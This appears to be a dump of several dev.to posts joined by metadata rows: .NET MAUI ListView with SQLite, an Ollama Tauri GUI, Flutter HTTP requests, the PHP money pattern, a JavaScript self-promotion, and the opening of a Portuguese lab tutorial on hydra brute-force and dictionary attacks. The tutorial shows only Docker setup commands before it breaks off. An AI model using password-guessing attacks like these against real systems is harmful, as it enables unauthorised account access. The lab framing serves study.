private ObservableCollection<Contact> contactsInfo;
private Contact selectedContact;
#endregion
#region Properties
public Contact SelectedItem
{
get
{
return selectedContact;
}
set
{
selectedContact = value;
OnPropertyChanged("SelectedItem");
}
}
public ObservableCollection<Contact> ContactsInfo
{
get
{
return contactsInfo;
}
set
{
contactsInfo = value;
OnPropertyChanged("ContactsInfo");
}
}
#endregion
#region Constructor
public ContactsViewModel()
{
GenerateContacts();
}
#endregion
#region Methods
private void GenerateContacts()
{
ContactsInfo = new ObservableCollection<Contact>();
ContactsInfo = new ContactsInfoRepository().GetContactDetails(20);
PopulateDB();
}
private async void PopulateDB()
{
foreach (Contact contact in ContactsInfo)
{
var item = await App.Database.GetContactAsync(contact);
if(item == null)
await App.Database.AddContactAsync(contact);
}
}
private async void OnAddNewItem()
{
await App.Database.AddContactAsync(SelectedItem);
ContactsInfo.Add(SelectedItem);
await App.Current.MainPage.Navigation.PopAsync();
}
#endregion
#region Interface Member
public event PropertyChangedEventHandler PropertyChanged;
public void OnPropertyChanged(string name)
{
if (this.PropertyChanged != null)
this.PropertyChanged(this, new PropertyChangedEventArgs(name));
}
#endregion
}
```
## Step 6: Define ListView with DataTemplate
Using the **Contact** model, let's define the .NET MAUI ListView **DataTemplate** bound to its properties.
```xml
<?xml version="1.0" encoding="utf-8" ?>
<ContentPage xmlns="http://schemas.microsoft.com/dotnet/2021/maui"
xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
xmlns:local="clr-namespace:ListViewMAUI"
xmlns:syncfusion="clr-namespace:Syncfusion.Maui.ListView;assembly=Syncfusion.Maui.ListView"
Title="Contacts Page"
x:Class="ListViewMAUI.MainPage">
<ContentPage.ToolbarItems>
<ToolbarItem Command="{Binding CreateContactsCommand}" IconImageSource="add.png">
</ToolbarItem>
</ContentPage.ToolbarItems>
<ContentPage.BindingContext>
<local:ContactsViewModel x:Name="viewModel"/>
</ContentPage.BindingContext>
<ContentPage.Resources>
<ResourceDictionary>
<local:TextConverter x:Key="TextConverter"/>
<local:ColorConverter x:Key="ColorConverter"/>
</ResourceDictionary>
</ContentPage.Resources>
<ContentPage.Content>
<syncfusion:SfListView x:Name="listView" TapCommand="{Binding EditContactsCommand}" ScrollBarVisibility="Always" ItemSize="70">
<syncfusion:SfListView.ItemTemplate>
<DataTemplate>
<Grid x:Name="grid" RowSpacing="0">
<Grid.RowDefinitions>
<RowDefinition Height="*" />
<RowDefinition Height="1" />
</Grid.RowDefinitions>
<Grid RowSpacing="0">
<Grid.ColumnDefinitions>
<ColumnDefinition Width="70" />
<ColumnDefinition Width="*" />
<ColumnDefinition Width="Auto" />
</Grid.ColumnDefinitions>
<Image Source="{Binding Image}" VerticalOptions="Center" HorizontalOptions="Center" HeightRequest="50" WidthRequest="50"/>
<Grid Grid.Column="1" RowSpacing="1" Padding="10,0,0,0" VerticalOptions="Center">
<Grid.RowDefinitions>
<RowDefinition Height="*" />
<RowDefinition Height="*" />
</Grid.RowDefinitions>
<Label LineBreakMode="NoWrap" TextColor="#474747" Text="{Binding Name}" FontSize="{OnPlatform Android={OnIdiom Phone=16, Tablet=18}, iOS={OnIdiom Phone=16, Tablet=18}, MacCatalyst=18, WinUI={OnIdiom Phone=18, Tablet=20, Desktop=20}}" />
<Label Grid.Row="1" Grid.Column="0" TextColor="#474747" LineBreakMode="NoWrap" Text="{Binding Number}" FontSize="{OnPlatform Android={OnIdiom Phone=12, Tablet=14}, iOS={OnIdiom Phone=12, Tablet=14}, MacCatalyst=14, WinUI={OnIdiom Phone=12, Tablet=12, Desktop=12}}" />
</Grid>
<Grid Grid.Row="0" Grid.Column="2" RowSpacing="0" HorizontalOptions="End" VerticalOptions="Start" Padding='{OnPlatform Default="0,10,10,0", MacCatalyst="0,10,15,0"}'>
<Label LineBreakMode="NoWrap" TextColor="#474747" Text="{Binding ContactType}" FontSize="{OnPlatform Android={OnIdiom Phone=10, Tablet=12}, iOS={OnIdiom Phone=10, Tablet=12}, MacCatalyst=12, WinUI={OnIdiom Phone=10, Tablet=11, Desktop=11}}" />
</Grid>
</Grid>
<StackLayout Grid.Row="1" BackgroundColor="#E4E4E4" HeightRequest="1"/>
</Grid>
</DataTemplate>
</syncfusion:SfListView.ItemTemplate>
</syncfusion:SfListView>
</ContentPage.Content>
</ContentPage>
```
## Step 7: Bind SQLite data to .NET MAUI ListView
Then, bind the data from the SQLite database to the .NET MAUI ListView control.
```csharp
public partial class MainPage : ContentPage
{
public MainPage()
{
InitializeComponent();
}
protected async override void OnAppearing()
{
base.OnAppearing();
listView.ItemsSource = await App.Database.GetContactsAsync();
}
}
```
After executing the previous code example, we’ll get the following output.
<figure>
<img src="https://www.syncfusion.com/blogs/wp-content/uploads/2023/11/Binding-SQLite-data-to-.NET-MAUI-ListView-2.png" alt="Binding SQLite data to .NET MAUI ListView" style="width:100%">
<figcaption>Binding SQLite data to .NET MAUI ListView</figcaption>
</figure>
## Perform CRUD operations with SQLite database and update in .NET MAUI ListView
Let’s see how to perform CRUD actions on the SQLite database and update the changes in the .NET MAUI ListView control.
Here, we have the **EditPage**, which enables us to add, save, and delete contact details. To perform such actions on this page, we must implement the code for performing CRUD operations on the SQLite database and commands in the **ViewModel** class, as mentioned in the following sections.
### Database implementation for CRUD operations
We have predefined methods in the **SQLite-net-pcl** assembly to perform CRUD operations. Refer to the following code example for database updates.
```csharp
public class SQLiteDatabase
{
readonly SQLiteAsyncConnection _database;
// Read Data
public async Task<List<Contact>> GetContactsAsync()
{
return await _database.Table<Contact>().ToListAsync();
}
// Read particular data
public async Task<Contact> GetContactAsync(Contact item)
{
return await _database.Table<Contact>().Where(i => i.ID == item.ID).FirstOrDefaultAsync();
}
// Add data
public async Task<int> AddContactAsync(Contact item)
{
return await _database.InsertAsync(item);
}
// Remove data
public Task<int> DeleteContactAsync(Contact item)
{
return _database.DeleteAsync(item);
}
// Update data
public Task<int> UpdateContactAsync(Contact item)
{
if (item.ID != 0)
return _database.UpdateAsync(item);
else
return _database.InsertAsync(item);
}
}
```
### Implement CRUD commands in the ViewModel class
The commands to add a new item, edit an item, or delete a selected item have been defined in the **ViewModel.cs** file.
Refer to the following code example.
```csharp
public class ContactsViewModel : INotifyPropertyChanged
{
#region Properties
public Command CreateContactsCommand { get; set; }
public Command<object> EditContactsCommand { get; set; }
public Command SaveItemCommand { get; set; }
public Command DeleteItemCommand { get; set; }
public Command AddItemCommand { get; set; }
#endregion
#region Constructor
public ContactsViewModel()
{
CreateContactsCommand = new Command(OnCreateContacts);
EditContactsCommand = new Command<object>(OnEditContacts);
SaveItemCommand = new Command(OnSaveItem);
DeleteItemCommand = new Command(OnDeleteItem);
AddItemCommand = new Command(OnAddNewItem);
}
#endregion
#region Methods
private async void OnAddNewItem()
{
await App.Database.AddContactAsync(SelectedItem);
ContactsInfo.Add(SelectedItem);
await App.Current.MainPage.Navigation.PopAsync();
}
private async void OnDeleteItem()
{
await App.Database.DeleteContactAsync(SelectedItem);
ContactsInfo.Remove(SelectedItem);
await App.Current.MainPage.Navigation.PopAsync();
}
private async void OnSaveItem()
{
await App.Database.UpdateContactAsync(SelectedItem);
await App.Current.MainPage.Navigation.PopAsync();
}
private void OnEditContacts(object obj)
{
SelectedItem = (obj as Syncfusion.Maui.ListView.ItemTappedEventArgs).DataItem as Contact;
var editPage = new Views.EditPage();
editPage.BindingContext = this;
App.Current.MainPage.Navigation.PushAsync(editPage);
}
private void OnCreateContacts()
{
SelectedItem = new Contact() { Name = "", Number = "", Image = "" };
var editPage = new Views.EditPage();
editPage.BindingContext = this;
App.Current.MainPage.Navigation.PushAsync(editPage);
}
#endregion
#region Interface Member
public event PropertyChangedEventHandler PropertyChanged;
public void OnPropertyChanged(string name)
{
if (this.PropertyChanged != null)
this.PropertyChanged(this, new PropertyChangedEventArgs(name));
}
#endregion
}
```
### Binding ViewModel commands to the EditPage
To design the **EditPage** , I’ve used the [Syncfusion .NET MAUI DataForm](https://help.syncfusion.com/maui/dataform/getting-started "Getting started with .NET MAUI DataForm") control. Then, I bound the commands from the **ViewModel** class to it. To edit the selected list view item and save the change back to the SQLite database, set the **CommitMode** property value to **PropertyChanged**.
Refer to the following code example.
```xml
<?xml version="1.0" encoding="utf-8" ?>
<ContentPage xmlns="http://schemas.microsoft.com/dotnet/2021/maui"
xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
xmlns:dataForm="clr-namespace:Syncfusion.Maui.DataForm;assembly=Syncfusion.Maui.DataForm"
x:Class="ListViewMAUI.Views.EditPage">
<StackLayout>
<dataForm:SfDataForm DataObject="{Binding SelectedItem}" CommitMode="PropertyChanged" />
<Grid HeightRequest="50">
<Grid.ColumnDefinitions>
<ColumnDefinition Width="*" />
<ColumnDefinition Width="*" />
<ColumnDefinition Width="*" />
</Grid.ColumnDefinitions>
<Button Text="Add" Grid.Column="0" Command="{Binding AddItemCommand}" />
<Button Text="Save" Grid.Column="1" Command="{Binding SaveItemCommand}" />
<Button Text="Delete" Grid.Column="2" Command="{Binding DeleteItemCommand}" />
</Grid>
</StackLayout>
</ContentPage>
```
Refer to the following image.
<figure>
<img src="https://www.syncfusion.com/blogs/wp-content/uploads/2023/11/Bonded-ViewModel-commands-to-the-Syncfusion-.NET-MAUI-DataForm-Edit-the-page-output.png" alt="Edit Page" style="width:100%">
<figcaption>Edit Page</figcaption>
</figure>
After executing all the previous code examples, you will get the following output. On tapping an item, you will get an edit page to change values or delete the tapped item. We’ve also added an icon (+) at the top-right corner of the ListView to add a new item to the list.

## GitHub reference
For more details, refer to the [Binding SQLite data to .NET MAUI ListView demos on GitHub](https://github.com/SyncfusionExamples/sqlite-data-binding-to-.net-maui-listview "Binding SQLite data to .NET MAUI ListView GitHub demos").
## Conclusion
Thanks for reading! In this blog, we’ve seen how to integrate and populate data from an SQLite database in the Syncfusion [.NET MAUI ListView](https://www.syncfusion.com/maui-controls/maui-listview ".NET MAUI ListView"). We encourage you to try the steps and share your feedback in the comments below.
Our customers can access the latest version of Essential Studio for .NET MAUI from the [License and Downloads](https://www.syncfusion.com/account/downloads "Essential Studio License and Downloads pages") page. If you are not a Syncfusion customer, you can download our [free evaluation](https://www.syncfusion.com/downloads "Get the free evaluation of the Essential Studio products") to explore all our controls.
For questions, you can contact us through our [support forum](https://www.syncfusion.com/forums "Syncfusion Support Forums"), [support portal](https://support.syncfusion.com/ "Syncfusion Support Portal"), or [feedback portal](https://www.syncfusion.com/feedback "Syncfusion Feedback Portal"). We are always happy to assist you!
## Related blogs
- [Chart of the Week: Creating a .NET MAUI Tornado Chart for Comparing Petrol and Diesel Prices in the UK](https://www.syncfusion.com/blogs/post/dotnet-maui-tornado-chart-prices.aspx "Blog: Chart of the Week: Creating a .NET MAUI Tornado Chart for Comparing Petrol and Diesel Prices in the UK")
- [Effortless Google Calendar Events Synchronization in .NET MAUI Scheduler](https://www.syncfusion.com/blogs/post/sync-google-calendar-dotnet-maui.aspx "Blog: Effortless Google Calendar Events Synchronization in .NET MAUI Scheduler")
- [Chart of the Week: Creating a .NET MAUI Radial Bar Chart for the Most and Least Powerful Passports in 2023](https://www.syncfusion.com/blogs/post/dotnet-maui-radial-bar-chart-passport-data.aspx "Blog: Chart of the Week: Creating a .NET MAUI Radial Bar Chart for the Most and Least Powerful Passports in 2023")
- [Load Appointments on Demand via Web Services in .NET MAUI Scheduler Using JSON Data](https://www.syncfusion.com/blogs/post/on-demand-loading-web-service-dotnet-maui.aspx "Blog: Load Appointments on Demand via Web Services in .NET MAUI Scheduler Using JSON Data") | jollenmoyani |
1,659,754 | Running Open Source Models locally with a TAURI GUI | I've always been a fan of the Ollama Project. Recently, I created a simple web UI for it. It was... | 0 | 2023-11-07T18:07:23 | https://dev.to/akintunde102/running-open-source-models-locally-with-a-tauri-gui-2i62 | ollama, llama, ai, tauri |

I've always been a fan of the [Ollama Project](https://ollama.ai).
Recently, I created a simple web UI for it. It was just a slap-together of react codes.
I've also developed a desktop application with improved features and user-friendliness. However, I can't share the MacBook executables just yet because I need to sign the app (which I plan to do soon).
My main goal is to share the open-source code with anyone who's interested in experiencing the beauty of running open-source models locally, without requiring any specialized programming skills. I also welcome contributions from the community.
You can find the project on GitHub here: https://github.com/Akintunde102/ollama-chat-desktop-app. | akintunde102 |
1,659,827 | Exploring HTTP Requests in Flutter | I'm excited to share insights into the world of HTTP requests in Flutter and how they play a vital... | 0 | 2023-11-08T02:30:00 | https://raman04.hashnode.dev/exploring-http-requests-in-flutter | api, flutter, programming, beginners | I'm excited to share insights into the world of HTTP requests in Flutter and how they play a vital role in mobile app development. Before diving into practical examples, I'd like to direct your attention to a couple of resources that can complement and expand your understanding of this topic.
I've created a YouTube video that delves into the very topic we're about to explore. In the video, I demonstrate the execution of HTTP requests in a Flutter environment, providing a visual guide that might enhance your understanding. You can find the video here: https://youtu.be/ml5Bv1zf6fI (highly recommended).
Additionally, I've curated a repository on GitHub where you can find relevant code snippets, supplementary materials, and resources related to the examples we'll be discussing. The GitHub repository is accessible here: https://github.com/raman04-byte/api_tutorial
Let's embark on this journey together, discovering the power and versatility of HTTP requests within Flutter and how they drive dynamic data interactions in mobile applications.
**Utilizing the HTTP Package**
Flutter's http package simplifies the process of making HTTP requests and handling responses. Let's explore two sample codes showcasing GET and POST requests.
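The samples below rely on the `http` and `cached_network_image` packages, so they need to be declared in `pubspec.yaml` first. The version constraints here are only illustrative; use whatever versions are current:

```yaml
dependencies:
  flutter:
    sdk: flutter
  http: ^1.1.0                  # for GET/POST requests
  cached_network_image: ^3.3.0  # image loading/caching (used in the GET sample)
```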
**Sample Code 1: Performing a POST Request**
The following code demonstrates how to send data to a server using a POST request:
```dart
import 'dart:async';
import 'dart:convert';
import 'package:apitutorial/home.dart';
import 'package:flutter/material.dart';
import 'package:http/http.dart' as http;
Future<Album> createAlbum(String title) async {
final response = await http.post(
Uri.parse('https://jsonplaceholder.typicode.com/albums'),
headers: <String, String>{
'Content-Type': 'application/json; charset=UTF-8',
},
body: jsonEncode(<String, String>{
'title': title,
}),
);
if (response.statusCode == 201) {
// If the server did return a 201 CREATED response,
// then parse the JSON.
return Album.fromJson(jsonDecode(response.body) as Map<String, dynamic>);
} else {
// If the server did not return a 201 CREATED response,
// then throw an exception.
throw Exception('Failed to create album.');
}
}
class Album {
final int id;
final String title;
const Album({required this.id, required this.title});
factory Album.fromJson(Map<String, dynamic> json) {
return Album(
id: json['id'] as int,
title: json['title'] as String,
);
}
}
void main() {
runApp(const MyApp());
}
class MyApp extends StatefulWidget {
const MyApp({super.key});
@override
State<MyApp> createState() {
return _MyAppState();
}
}
class _MyAppState extends State<MyApp> {
final TextEditingController _controller = TextEditingController();
Future<Album>? _futureAlbum;
@override
Widget build(BuildContext context) {
return MaterialApp(
title: 'Create Data Example',
theme: ThemeData(
colorScheme: ColorScheme.fromSeed(seedColor: Colors.deepPurple),
),
home: Scaffold(
appBar: AppBar(
title: const Text('Create Data Example'),
),
body: Container(
alignment: Alignment.center,
padding: const EdgeInsets.all(8),
child: (_futureAlbum == null) ? buildColumn() : buildFutureBuilder(),
),
),
);
}
Column buildColumn() {
return Column(
mainAxisAlignment: MainAxisAlignment.center,
children: <Widget>[
TextField(
controller: _controller,
decoration: const InputDecoration(hintText: 'Enter Title'),
),
ElevatedButton(
onPressed: () {
setState(() {
_futureAlbum = createAlbum(_controller.text);
});
},
child: const Text('Create Data'),
),
],
);
}
FutureBuilder<Album> buildFutureBuilder() {
return FutureBuilder<Album>(
future: _futureAlbum,
builder: (context, snapshot) {
if (snapshot.hasData) {
return Text(snapshot.data!.title);
} else if (snapshot.hasError) {
return Text('${snapshot.error}');
}
return const CircularProgressIndicator();
},
);
}
}
```
This code is a simple Flutter application that demonstrates creating an album by sending a POST request to a mock API endpoint using the http package in Dart. Here's a breakdown of the major components:
**Import Statements**
- Importing necessary Dart and Flutter packages like `async`, `http`, `material`, and `json`.

**`Album` Class**
- The `Album` class represents an album with an `id` and `title`. It contains a constructor and a `fromJson` factory method to convert JSON data into an `Album` object.

**`createAlbum` Function**
- `createAlbum` is an asynchronous function that uses the `http.post` method to send a POST request to the specified API endpoint (`https://jsonplaceholder.typicode.com/albums`).
- It sends a JSON payload containing the album title in the request body.
- If the request is successful (returns a status code of 201 - Created), it parses the response JSON and creates an `Album` object using the `fromJson` factory method.
- If the request fails or returns a different status code, it throws an exception indicating the failure to create an album.

**`main` Function**
- The `main` function sets up the Flutter application by running the `MyApp` widget.

**`MyApp` Class**
- `MyApp` is a stateful widget that defines the root of the application.

**`_MyAppState` Class**
- `_MyAppState` is the state associated with `MyApp` and contains the text controller for the input field and a `Future<Album>` object to handle the asynchronous creation of an album.

**`build` Method**
- The `build` method sets up the UI of the application.
- It configures the app's theme and defines the `Scaffold` with an `AppBar` and a body.
- The body contains a container with a column widget, which holds a text field for entering the album title and a button to trigger the creation of the album.

**`buildColumn` Method**
- `buildColumn` returns a column containing a text field and a button.
- The button triggers the creation of the album by calling the `createAlbum` function when pressed.

**`buildFutureBuilder` Method**
- `buildFutureBuilder` returns a `FutureBuilder` widget that displays different UI elements based on the state of the asynchronous operation (`_futureAlbum`).
- If the operation is complete and successful, it displays the title of the created album.
- If there's an error during the operation, it displays the error message.
- While the operation is in progress, it displays a circular progress indicator.
The application allows users to enter a title for an album, create it via a POST request, and displays the result or error message accordingly using Flutter's FutureBuilder.
This code showcases a function createAlbum that sends a POST request to a server. It includes an Album class representing the structure of an album and a UI setup in the MyApp class allowing users to input an album title and create an album.
**Sample Code 2: Performing a GET Request**
Let's take a look at the code that fetches data from a server using a GET request:
```dart
import 'package:apitutorial/model/response/list_of_response.dart';
import 'package:flutter/material.dart';
import 'package:http/http.dart' as http;
import 'dart:convert';
import 'package:cached_network_image/cached_network_image.dart';
class HomeScreen extends StatefulWidget {
const HomeScreen({super.key});
@override
State<HomeScreen> createState() => _HomeScreenState();
}
class _HomeScreenState extends State<HomeScreen> {
List<ListOfData> _list = [];
Future<List<ListOfData>> getAllData() async {
try {
final response =
await http.get(Uri.parse('https://fakestoreapi.com/products'));
if (response.statusCode == 200) {
final data = jsonDecode(response.body);
_list = data.map<ListOfData>((e) => ListOfData.fromJson(e)).toList();
debugPrint('${_list.length}');
return _list;
} else {
debugPrint(
'Error in API call Please check your backend and URL carefully');
}
return _list;
} catch (e) {
debugPrint('$e');
}
return _list;
}
@override
Widget build(BuildContext context) {
return Scaffold(
body: FutureBuilder(
future: getAllData(),
builder: (context, snapshot) {
if (snapshot.hasData) {
return ListView.builder(
itemCount: _list.length,
shrinkWrap: true,
itemBuilder: (context, index) {
return ListTile(
title: Text('${_list[index].title}'),
subtitle: Text('${_list[index].description}'),
leading: SizedBox(
height: 50,
width: 50,
child: CachedNetworkImage(
imageUrl: '${_list[index].image}',
progressIndicatorBuilder: (context, url, progress) =>
CircularProgressIndicator(
value: progress.progress),
),
),
trailing: Text('${_list[index].price}'),
);
});
} else if (snapshot.hasError) {
return const Text("Error");
}
return const Text("No Data");
}),
);
}
}
```
This code represents a Flutter StatefulWidget named HomeScreen that fetches data from a specified API endpoint and displays the information in a ListView.
Here's a breakdown of the code:
**Import Statements**
- Various package imports are included, such as `material` from Flutter, `http` for making HTTP requests, `cached_network_image` for efficiently loading and caching network images, and `json` for encoding and decoding JSON data.

**`HomeScreen` Class**
- `HomeScreen` is a StatefulWidget representing the main screen of the application.

**`_HomeScreenState` Class**
- `_HomeScreenState` manages the state for the `HomeScreen`.

**State Variables**
- `_list` is a list of `ListOfData` objects.

**`getAllData` Method**
- `getAllData` is an asynchronous function that makes an HTTP GET request to `https://fakestoreapi.com/products` to fetch data.
- If the response status is 200 (OK), the JSON response is decoded and used to populate `_list` by mapping the JSON data to `ListOfData` objects (presumably defined in `list_of_response.dart`).
- Debug print statements are used to display the count of items fetched or any error encountered during the API call.

**`build` Method**
- The `build` method configures the UI for the `HomeScreen`.
- It displays a `Scaffold` containing a `FutureBuilder` that waits for the result of `getAllData`.
- When data is received, it displays a `ListView.builder` widget, populating the list with data fetched from the API.
- Each list item is represented by a `ListTile` containing text fields for the title, description, and price. It also includes a `CachedNetworkImage` widget for loading and displaying the product image.

The `FutureBuilder` is responsible for showing different UI components based on the current state of the asynchronous operation:
- If data is available, it displays the list of items fetched from the API.
- If there is an error during the API call, it shows an error message.
- If no data is available, it displays a message indicating the absence of data.
This code provides a basic structure to fetch data from an API and display it in a list format, including images loaded from network URLs using the cached_network_image package to ensure efficient caching and loading of images in the Flutter app.
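One piece not shown above is the `ListOfData` model imported from `list_of_response.dart`. A minimal sketch covering just the fields the UI uses (the exact model in the repository may differ):

```dart
// model/response/list_of_response.dart - minimal sketch of the fields used above
class ListOfData {
  final int? id;
  final String? title;
  final String? description;
  final String? image;
  final num? price;

  ListOfData({this.id, this.title, this.description, this.image, this.price});

  // Maps one product object from the Fake Store API response
  factory ListOfData.fromJson(Map<String, dynamic> json) {
    return ListOfData(
      id: json['id'] as int?,
      title: json['title'] as String?,
      description: json['description'] as String?,
      image: json['image'] as String?,
      price: json['price'] as num?,
    );
  }
}
```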
Both sample codes illustrate practical implementations of making HTTP requests in Flutter using the http package. The first code focuses on creating data through a POST request, while the second code emphasizes retrieving and displaying data via a GET request.
Continuing the article with a discussion on best practices, error handling, and the nuances of using Flutter's HTTP library would complement the multimedia content and provide a comprehensive guide for readers interested in networking with Flutter applications. | raman04byte |
1,659,831 | Money pattern in PHP: the problem | Introduction When we work with numbers, we may face moments when we lose precision, maybe... | 25,302 | 2023-11-15T09:00:00 | https://dev.to/rubenrubiob/money-pattern-in-php-the-problem-334a | php, designpatterns, money, number | ## Introduction
When we work with numbers, we may face moments when we lose precision, maybe because the number is gigantic or maybe because it has infinite decimals. The problem is representing infinite numbers in a finite system; no matter how much memory you have, it will always be finite. This number representation is known as [floating point (IEEE 754)](https://en.wikipedia.org/wiki/IEEE_754).
Depending on the case, the problem might be serious. For instance, in an e-commerce, a precision error may result in charging less money to a client, resulting in a loss of money for our company. Or we may charge her more, starting a possible legal problem.
I encountered such a problem on a project I collaborated on. Imagine we have two products in this store: one with a final price of €5.50 and the other with a final price of €5.30. If a client buys five units of each, we would expect a bill like the following one:
| Base price (€) | VAT (21%) (€) | Final price (€) |
|:--|:--|:--|
| 4.55 | 0.95 | 5.50 |
| 4.55 | 0.95 | 5.50 |
| 4.55 | 0.95 | 5.50 |
| 4.55 | 0.95 | 5.50 |
| 4.55 | 0.95 | 5.50 |
| 4.38 | 0.92 | 5.30 |
| 4.38 | 0.92 | 5.30 |
| 4.38 | 0.92 | 5.30 |
| 4.38 | 0.92 | 5.30 |
| 4.38 | 0.92 | 5.30 |
| **44.65** | **9.35** | **54.00** |
For the legal bill, each product had to show its price broken down. Thus, to calculate the final price, the software started from the base price and then calculated the VAT and the final price. Trying to prevent the floating point problem, amounts were stored with up to three decimal places.
However, these calculations were not done in one place and stored for the rest of the flow; they were repeated everywhere the price was shown. And the calculation was not performed the same way in all places: in some places the base price was rounded first, in others only the final price was rounded…
Therefore, we found that the summary the client saw before paying was
| Base price (€) | VAT (21%) (€) | Final price (€) |
|:--|:--|:--|
| 4.545 | 0.9545 | 5.4995 |
| 4.545 | 0.9545 | 5.4995 |
| 4.545 | 0.9545 | 5.4995 |
| 4.545 | 0.9545 | 5.4995 |
| 4.545 | 0.9545 | 5.4995 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| **44.625** | **9.372** | **53.997** |
Instead, the bill the client received was the following one:
| Base price (€) | VAT (21%) (€) | Final price (€) |
|:--|:--|:--|
| 4.550 | 0.9555 | 5.5055 |
| 4.550 | 0.9555 | 5.5055 |
| 4.550 | 0.9555 | 5.5055 |
| 4.550 | 0.9555 | 5.5055 |
| 4.550 | 0.9555 | 5.5055 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| 4.380 | 0.9198 | 5.2998 |
| **44.65** | **9.38** | **54.03** |
Beyond the inconsistencies in the calculations, which resulted from not following good practices, the real problem was that the expected result was never obtained. How should we have performed the calculations? Where should we have rounded the values?
## Rounding in PHP
In PHP, we have several functions to round numbers:
- `floor($amount)`: Returns the next lowest integer value (as float) by rounding down value if necessary.
- `ceil($value)`: Returns the next highest integer value by rounding up value if necessary.
- `round($amount, $precision, $mode)`: Returns the rounded value of val to specified precision (number of digits after the decimal point). Precision can also be negative or zero (default).
- `number_format($amount, $decimals)`: Formats a number with grouped thousands and optionally decimal digits.
Which of these functions did we need to use? And how? The answer is none of them. In any case, we would have ended up losing precision anyway.
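A quick demonstration of why (the `floor` example comes from the PHP manual's own floating point warning):

```php
var_dump(0.1 + 0.2 == 0.3);        // bool(false): 0.1 + 0.2 is actually 0.30000000000000004
var_dump(floor((0.1 + 0.7) * 10)); // float(7), not 8: the product is 7.9999999999999991...
```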
## Money pattern
Actually, we are not framing the problem correctly. Besides an amount, a price also has a currency. When we say a product costs 10, what do we mean? €10? $10? ¥10? The price varies if we do not take the currency into account. Precisely, the currency determines the number of decimal places for an amount, i.e., its minor unit. This is something we can use to store prices.
In that line of thought, there is [the money pattern](https://www.martinfowler.com/eaaCatalog/money.html). It consists of using a value object with two attributes: the currency and the amount in the minor unit. Thus, €89.99 would be stored as 8999.
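As a minimal sketch of the idea (illustrative only; in practice, use one of the libraries listed below):

```php
<?php

final class Money
{
    private int $amount;      // amount in the currency's minor unit (e.g. cents)
    private string $currency; // ISO 4217 code, e.g. 'EUR'

    private function __construct(int $amount, string $currency)
    {
        $this->amount = $amount;
        $this->currency = $currency;
    }

    public static function ofMinor(int $amount, string $currency): self
    {
        return new self($amount, $currency);
    }

    public function add(self $other): self
    {
        if ($other->currency !== $this->currency) {
            throw new InvalidArgumentException('Cannot add different currencies');
        }

        return new self($this->amount + $other->amount, $this->currency);
    }
}

$price = Money::ofMinor(8999, 'EUR'); // €89.99 stored as the integer 8999
```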
## Libraries
In PHP, there are open-source libraries that implement the money pattern, thus solving both problems at once: working with big numbers (up to a limit) and having prices with amount and currency.
The most important ones are:
- [brick/money](https://github.com/brick/money)
- [moneyphp/money](https://github.com/moneyphp/money)
Internally, both can rely on PHP's [`BCMath`](https://www.php.net/manual/en/book.bc.php) extension to perform calculations, representing numbers as `string` or `int`, so no decimal precision is lost.
[There is a comparison between both libraries](https://github.com/brick/money/issues/28). However, any of the two is a good option to perform calculations safely.
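For instance, a quick sketch with brick/money, revisiting the prices from the introduction:

```php
use Brick\Math\RoundingMode;
use Brick\Money\Money;

$unitA = Money::of('5.50', 'EUR');
$unitB = Money::of('5.30', 'EUR');

// Exact decimal arithmetic: five units of each product.
$total = $unitA->multipliedBy(5)->plus($unitB->multipliedBy(5));
echo $total; // EUR 54.00

// Rounding only happens where we explicitly ask for it.
$vat = $total->multipliedBy('0.21', RoundingMode::HALF_UP);
echo $vat; // EUR 11.34
```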
## Conclusions
We have seen the problems that arise when working with floating point numbers. None of PHP's native rounding functions is a solution.
To work with prices, the solution consists of using the money pattern. There are libraries in PHP that implement it using the BCMath extension, so the calculations are safely done (up to a limit).
In the next post, we will see an implementation that correctly solves the example we saw in the introduction. | rubenrubiob |
1,659,967 | JavaScript Beast on the Block | Hello world... If you are looking to learn from an expert... And take your programming to the next... | 0 | 2023-11-07T22:02:30 | https://dev.to/erasmuskotoka/javascript-beast-on-the-block-4n30 | Hello world...
If you are looking to learn from an expert...
And take your programming to the next level...
Or in search of someone to take on your programming projects...
Then look no further because I am the Programming Beast on the block.
I am about to reshape the future with code one line at a time.
I am knowledgeable in JavaScript and React, with over four years of programming experience.
Having worked with over fifty clients and turned their projects into masterpieces...
I dare say that I have the key to unlock your next programming project.
Ready for the magic?
Just send a DM or an Email and let's get started.
Keep your eyes locked on the TL for more. | erasmuskotoka | |
1,660,062 | Performing brute force attacks on docker containers using hydra | In this post we will learn how to use the hydra tool for brute force and dictionary attacks ... | 0 | 2023-11-20T22:40:13 | https://dev.to/cancio/testando-o-hydra-com-o-docker-3ceg | hydra, docker, kali, linux | In this post we will learn how to use the hydra tool for brute force and dictionary attacks against a website or from one computer to another. By definition:
> A **dictionary attack** is an attack on passwords that **uses common words or phrases found in dictionaries to compromise user credentials**. If you are someone who uses dictionary words or common phrases as a password, you run the risk of falling victim to a dictionary attack. Source: [Keeper Security](https://www.keepersecurity.com/pt_BR/threats/dictionary-attack.html#:~:text=Um%20ataque%20de%20dicion%C3%A1rio%20%C3%A9,de%20um%20ataque%20de%20dicion%C3%A1rio.)
> Brute Force is a "hacker" attack used to try to discover the correct combination for a password by trying many different combinations. The attack can be carried out manually, entering passwords one at a time until the real one is found. Source: [Brasil Cloud](https://brasilcloud.com.br/brute-force-o-que-e-e-como-se-prevenir/#:~:text=Como%20funciona%20e%20para%20que,que%20a%20verdadeira%20seja%20encontrada.)
To carry out the attacks we will use a controlled environment made of Docker containers. If you are new to Docker, think of containers as something like virtual machines, only simpler and lighter: if creating a virtual machine is like preparing a lasagna from scratch, Docker is like a ready-made lasagna you just heat up in the microwave. Instead of spending time preparing the ingredients, you grab a ready-made image (your favorite lasagna flavor) and use it to prepare your meal (the Docker container).
The image we will use is [cancitoo/kali-linux-ssh-hydra](https://hub.docker.com/r/cancitoo/kali-linux-ssh-hydra); just run the command below on your machine (Docker must already be installed):
```bash
docker pull cancitoo/kali-linux-ssh-hydra
```
With that, we have everything we need for our lab.
# Dictionary attack against a website
For this attack we will create our first machine; in this example we use the following command:
```bash
docker run --name pc01 -p 6050:22 -i -t cancitoo/kali-linux-ssh-hydra bash
```
